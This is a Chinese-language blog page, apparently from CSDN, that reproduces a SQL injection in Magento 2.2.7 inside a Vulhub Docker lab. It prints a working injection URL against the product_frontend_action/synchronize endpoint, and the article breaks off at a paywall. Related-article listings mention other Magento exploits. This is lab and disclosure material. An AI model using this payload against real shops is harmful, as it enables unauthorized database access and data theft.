Magento 2.2 SQL注入漏洞

最新推荐文章于 2024-06-28 09:55:32 发布
最新推荐文章于 2024-06-28 09:55:32 发布
阅读量1.5k 收藏
点赞数
分类专栏: 漏洞 文章标签: apache solr lucene
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/121672395
版权
漏洞简介agento(麦进斗)是一款新的专业开源电子商务平台,采用php进行开发,使用Zend Framework框架。设计得非常灵活,具有模块化架构体系和丰富的功能。其prepareSqlCondition函数存在一处二次格式化字符串的bug,导致引入了非预期的单引号,造成SQL注入漏洞。漏洞复现使用vulhub 执行如下命令启动Magento 2.2.7:docker-compose up -d环境启动后,访问http://your-ip:8080,即可看到Magento的安装页面。安装M
摘要由CSDN通过智能技术生成

漏洞简介

agento(麦进斗)是一款新的专业开源电子商务平台,采用php进行开发,使用Zend Framework框架。设计得非常灵活,具有模块化架构体系和丰富的功能。

其prepareSqlCondition函数存在一处二次格式化字符串的bug,导致引入了非预期的单引号,造成SQL注入漏洞。

漏洞复现

使用vulhub 执行如下命令启动Magento 2.2.7:

docker-compose up -d

环境启动后,访问http://your-ip:8080,即可看到Magento的安装页面。安装Magento时,数据库地址填写mysql,账号密码均为root,其他保持默认:

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
更换端口抓包

http://your-ip:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1%3d0)+--+-

在这里插入图片描述

http://your-ip:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=)))+OR
最低0.47元/天 解锁文章
GuiltyFet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
利用Vulnhub复现漏洞 - Magento 2.2 SQL注入漏洞
JiangBuLiu的博客
07-12 2448
Magento 2.2 SQL注入漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现登录管理员账号使用POC读取管理员的session原理理解端口设置浏览器设置BurpSuit设置 Vulnhub官方复现教程 https://vulhub.org/#/environments/magento/2.2-sqli/ 漏洞原理 Magento(麦进斗)是一款新的专业开源电子商务平台,采用ph...
【风险通告】Adobe Magento 远程代码执行漏洞
爱国小白帽
10-21 602
[金山云安全](javascript:void(0)???? 今天 近日,金山云安全应急响应中心监测到,Adobe官方发布了CVE-2020-24407远程代码执行及CVE-2020-24400: SQL注入漏洞通告。 该漏洞风险等级为高危,请相关用户尽快将Magento Commerce/Open Source升级到最新版本,做好资产自查工作,避免遭受不必要的损失。 漏洞描述 Magento是一套专业开源的电子商务系统。本次Adobe官方发布安全公告披露了的 CVE-2020-24407远程代码执行、CV
外贸网站Magento存在漏洞导致网站被攻击入侵的防护办法
网站安全专家
05-11 605
有些客户在找我们SINESAFE做网站安全服务之前,客户也找过建站的公司去清除后门,建站公司也将系统迁移升级到了最新的2.4.4版本,但后来发现问题并没有完全的解决,还是会反复的被篡改代码和用户的支付页面被劫持跳转,问题的根源是代码里已经被黑客植入后门了,数据库也被留了木马病毒,这个时候不光是要升级magento到最新版本,还得要把木马后门给彻底的清理掉,做好安全加固和防护,才能彻底的解决这个问题。第三,保存服务器的环境,以及现场的各种信息,如端口网络、应用程序、日志文件等。
magento2.2-2.3
04-08
IFlow 2.2和2.3发送模块要求为了使模块正确运行,必须具备以下条件: Magento version >= 2.2 y < 2.4安装要完成模块的安装,请按照iFlow-Magento Configuration Manual.pdf中指定的说明进行操作,请参阅文件...
magento2.2
03-12
欢迎来到Magento 2安装! 我们很高兴您选择安装Magento 2,这是一项功能强大的尖端,功能丰富的电子商务解决方案。 Magento系统要求 安装Magento 要安装Magento,请参见: 贡献给Magento 2代码库 贡献可以采用新...
magento-devdocs:Magento2.2中文文档
05-01
Magento 中文文档欢迎使用Magento中文文档,由于此文档使用Jekyll在github上编译会出现超时问题,故本文档每周五从master由笔者本地编译到gh-pages分支。请不要直接在gh-pages分支上进行翻译。本仓库起于,最后更新...
magento导出数据sql
08-08
首先,`magento导出数据sql`是指使用SQL语句来提取Magento数据库中的数据。这通常涉及到备份、分析或迁移数据到其他系统。在Magento中,数据主要存储在MySQL数据库中,因此我们可以通过以下几种方式来导出数据: 1....
magento SQL常用命令
08-11
magento SQL常用命令,数据库操作
magento-di:Magento 的依赖注入系统
06-27
magento-di 这提供了一个小模块和一些技巧,使 Symfony DI 与 Magento 核心集成(在一定程度上)。 为什么? 我在想我和一次谈话。 我们一直在谈论将 Phpspec 与 Magento 一起使用,以及我们如何经常需要模拟 Magento 对象。 这是我之前接受的与 Magento 合作的必要弊端,但我开始认为我可能采取了错误的方法。 我们应该首先测试的代码是我们的领域模型。 如果我们要实现 DDD 原则,那么我们应该在代码中表示我们领域的所有方面,并且没有理由为什么这些对象中的任何一个应该以任何方式耦合到特定框架。 考虑到这一点,将任何域代码放在 Magento 代码池中是没有意义的,因为它与 Magento 无关。 Magento 中现有的框架不可知代码模式是将其放在 lib 目录中,但没有理由不应该将其作为 Composer 加载的依赖项。 那么为什么需
Magento-shoplift-python-exploit:Magento入店行窃漏洞是CheckPoint团队发现的漏洞(http
05-14
Magento-shoplift-python-exploit Magento shoplift漏洞是CheckPoint团队发现的漏洞( )这个由乔伦(Joren)开发的python脚本,但由于存在一些错误,因此它无法正常工作。 如果magento版本易受攻击,则此脚本将使用用户名forme和password forme创建管理员帐户。 --==[[ Greetz To ]]==-- ################################################ ######################################## ,root_devil,google_warrior,INX_r0ot,Darkwolf indishell,Baba,#Silenttoxic India,Magnum sn
magento < 1.9 xss 漏洞修复说明
weixin_33922670的博客
02-16 200
magento XSS漏洞 介绍就不说了 百度一下 到处都是这边简单记录下 处理过程, (比较粗暴,是否有效尚未验证)编辑app/design/adminhtml/default/default/template/sales/order/view/info.phtml文件搜索 getCustomerEmail 有两处 输出调用使用 htmlentities 方...
Magento2 - 能够完全控制网店的漏洞 (CVE-2016-4010)
weixin_33897722的博客
06-02 750
以色列安全研究人员Netanel Rubin于2016年5月17日报告了关于Magento电子商务平台的高危漏洞。攻击者可以利于XMLRPC或REST接口中对于参数序列化与反序列化的逻辑错误,任意替换对象中与数据库操作、文件操作等敏感内容相关类,以达到完全控制网詀的漏洞。该漏洞代号CVE-2016-4010,威胁度评分可达9.8/10。对于该漏洞,Mag...
Magento新的ZEND FRAMEWORK安全漏洞
Pedrito666的博客
10-12 296
Magento原厂近日发布了一个与Zend Framework 1和2的Email元件相关的安全性漏洞。包括Magento 1.x和Magento 2.x在内的许多PHP解决方案都使用了这个元件。如果您的服务器使用Sendmail作为邮件传输代理的话,这个严重的漏洞可导致恶意的黑客使用远端代码执行攻击。 要保护您的网站免受此漏洞的影响,您应该立即检查邮件发送设定。请到您的Magento商店后台修...
Adobe Magento OR Commerce电子商务系统 XXE漏洞复现(CVE-2024-34102)
最新发布
0xSec
06-28 687
2024年6月,Adobe官方披露CVE-2024-34102 Magento estimate-shipping-methods XXE漏洞,攻击者可在无需登陆的情况下构造恶意请求利用XXE读取文件,或者结合CVE-2024-2961 可能造成远程代码执行。
【高危安全通告】Adobe Magento Open Source远程代码执行漏洞
bocco的博客
02-16 2320
近日,安全狗应急响应中心监测Adobe Magento Open Source被露出远程代码执行漏洞漏洞编号CVE-2022-24086。可导致恶意用户远程代码执行等危害。 为避免您的业务受影响,安全狗建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞描述 Adobe Magento是美国奥多比(Adobe)公司的一套开源的PHP电子商务系统,该系统提供权限管理、搜索引擎和支付网关等功能,Magento Open Source是Magento的开源版.
利用关键Magento 2漏洞对电子商务站点的持续Xurum攻击
m0_73248913的博客
08-15 107
E-commerce sites using Adobe's Magento 2 software are the target of an ongoing campaign that has been active since at least January 2023.The attacks, dubbed Xurum by Akamai, leverage a now-patched critical security flaw (CVE-2022-24086, CVSS score: 9.8) in
Magento中直接使用SQL语句
笑青天的专栏
11-21 1367
有时希望在Magento模块中写一些SQL语句,绕过资源模型,可以这样 1. protected function _getResource() { return Mage::getSingleton('core/resource'); } 2.插入操作 $table = $this->_getResource()->getTableName('supplier
magento2-frontend-developer.pdf
05-19
"Magento2前端开发者学习指南" 《Magento2前端开发者学习指南》是由Joseph Maxwell和SwiftOtter Solutions共同编写的,专为想要深入理解Magento 2前端开发的初学者设计的一份详尽的学习资料。该指南覆盖了Magento 2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值